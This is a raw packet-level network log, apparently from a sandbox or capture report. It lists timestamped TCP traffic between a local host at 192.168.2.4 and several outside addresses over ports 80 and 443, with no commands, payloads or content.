Sep 27, 2024 00:15:11.280292034 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280304909 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280306101 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280317068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280327082 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280328989 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280343056 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280345917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280355930 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280366898 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280366898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280376911 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280379057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280392885 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280395031 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280406952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280416965 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280417919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280428886 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280431032 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280442953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280451059 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280457020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280467987 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280478954 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280483007 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280491114 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280503035 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280508995 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280514002 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280527115 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280527115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280554056 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280554056 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280580044 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280581951 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280595064 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280606985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280617952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280628920 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280635118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280639887 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280651093 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280662060 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280662060 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280673981 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280683041 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280685902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280698061 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280714989 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280715942 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280729055 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280730963 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280740976 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280752897 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280754089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280765057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280775070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280774117 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280788898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280818939 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.283843994 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:11.284143925 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:11.284229994 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:11.284393072 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:11.284410000 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:11.284478903 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:11.284486055 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:11.301851034 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:11.301904917 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:11.301974058 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:11.302378893 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:11.302406073 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:11.348360062 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:11.348400116 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:11.348479986 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:11.349040985 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:11.349059105 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:11.885338068 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:11.885422945 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.035368919 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.035408974 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.035785913 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.038089037 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.038116932 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.038208961 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.065335989 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:12.068341017 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:12.082890034 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:12.082901955 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:12.084630966 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:12.084639072 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:12.490931988 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.491046906 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.491131067 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.494852066 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.494852066 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:12.494879961 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.494893074 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:12.511373043 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.511440039 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:12.511528015 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.511956930 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.511975050 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:12.800515890 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:12.806869030 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:12.806952000 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:12.815418005 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:12.822416067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:12.983834028 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:12.983937979 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.985887051 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.985898018 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:12.986180067 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:12.987433910 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.987464905 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:12.987524986 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:13.025783062 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.025861025 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.025862932 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.025934935 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.026819944 CEST	49772	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.026840925 CEST	443	49772	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.037508011 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.037552118 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.037640095 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.038022041 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.038041115 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.434382915 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434405088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434416056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434473991 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434485912 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434495926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434506893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434519053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434526920 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.434526920 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.434537888 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434550047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.434562922 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.434602976 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.438291073 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:13.438400984 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:13.438477039 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:13.440134048 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:13.440148115 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:13.440165043 CEST	49773	443	192.168.2.4	172.67.162.108
Sep 27, 2024 00:15:13.440171003 CEST	443	49773	172.67.162.108	192.168.2.4
Sep 27, 2024 00:15:13.440391064 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.440403938 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.440414906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.440480947 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.462789059 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.462831020 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:13.462971926 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.463413954 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.463427067 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:13.524570942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524593115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524605036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524651051 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.524826050 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524879932 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.524892092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524904013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524957895 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.524971008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.524983883 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.525021076 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.525796890 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.525816917 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.525829077 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.525865078 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.525891066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.525903940 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.526063919 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.526761055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.526773930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.526786089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.526798964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.526810884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.526835918 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.526835918 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.526880026 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.527718067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.527731895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.527743101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.527776003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.527787924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.527815104 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.527853012 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.614955902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615012884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615084887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615087986 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.615118980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615153074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615163088 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.615178108 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615238905 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.615397930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615411043 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615422964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615454912 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.615973949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615986109 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.615998983 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616013050 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616022110 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.616096973 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.616215944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616228104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616239071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616250992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616276026 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.616280079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616291046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616300106 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.616303921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616317034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.616328001 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.616344929 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.617218018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617229939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617245913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617275953 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.617284060 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.617292881 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617305040 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617316961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617328882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617353916 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.617379904 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.617381096 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.618206024 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618217945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618228912 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618263960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618273020 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.618273020 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.618274927 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618288040 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618299961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618349075 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.618371010 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.664514065 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.690356016 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.690540075 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.691009045 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.691016912 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.693074942 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:13.693082094 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:13.705610037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.705708981 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.705720901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.705785036 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.706279039 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.706419945 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.706456900 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.706593037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.706604004 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.706615925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.706697941 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.707289934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.707302094 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.707313061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.707395077 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.708117008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.708128929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.708139896 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.708152056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.708185911 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.708209991 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.708976030 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.708988905 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.709001064 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.709013939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.709043980 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.709105968 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.709656000 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.709667921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.709677935 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.709734917 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.710491896 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.710505009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.710510015 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.710515976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.710612059 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.711209059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.711221933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.711231947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.711328983 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.712021112 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712033987 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712045908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712131977 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.712774038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712785959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712796926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712807894 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.712862968 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.712862968 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.713597059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.713608980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.713624001 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.713670969 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.714330912 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.714343071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.714354038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.714435101 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.715167046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715178967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715184927 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715194941 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715281010 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.715907097 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715919971 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715930939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.715964079 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.716701031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.716712952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.716723919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.716818094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.716818094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.717541933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.717554092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.717564106 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.717576981 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.717588902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.717614889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.717667103 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.719073057 CEST	80	49774	147.45.44.104	192.168.2.4
